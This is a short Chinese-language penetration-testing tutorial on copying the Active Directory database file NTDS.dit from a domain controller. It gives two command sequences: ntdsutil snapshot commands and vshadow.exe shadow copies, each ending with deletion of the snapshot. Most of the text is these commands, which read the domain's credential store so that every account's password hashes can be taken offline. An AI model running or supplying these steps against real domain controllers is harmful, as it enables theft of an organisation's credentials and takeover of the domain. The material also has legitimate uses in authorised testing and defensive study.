渗透测试——卷影复制服务下载NTDS.dit（拿到域控）_卷影复制工具

目录

NTDS.dit获取

方式一（卷影复制服务）相当于快照

方法二（利用工具vshadow工具，原理也是卷影）

---

NTDS.dit获取

在域控的情况下，由于ntds.dit在使用，所以它不能进行移动下载到桌面更不能拿出来，下面解释两种方式

方式一（卷影复制服务）相当于快照

 ntdsutil按步骤执行命令创建快照

# 进入ntdsutil命令行
ntdsutil
 
# 进入快照
snapshot
 
# 激活 AD DS 实例
activate instance ntds
 
create
mount {GUID}
copy C:\$SNAP_202406162052_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit  #可用可不用
 
# copy 完之后再执行快照删除操作
unmount {GUID}
del {GUID}

 出现和C盘一样的快照，这样就可以进快照获取ntds.dit了

方法二（利用工具vshadow工具，原理也是卷影）

vshadow.exe -p -nw C:
 
参数说明：
 
-p persistent，备份操作，重启系统不会删除
 
-nw no writers，用来提高创建速度
 
C: 对应c盘

 记住这三信息Shadow copy device name、SnapshotSetID、SNAPSHOT ID

copy [Shadow copy device name]\windows\ntds\ntds.dit c:\ntds.dit

 成功获取到，可以进行下载

vshadow -dx={SnapshotSetID}
 
vshadow -ds={SNAPSHOT ID}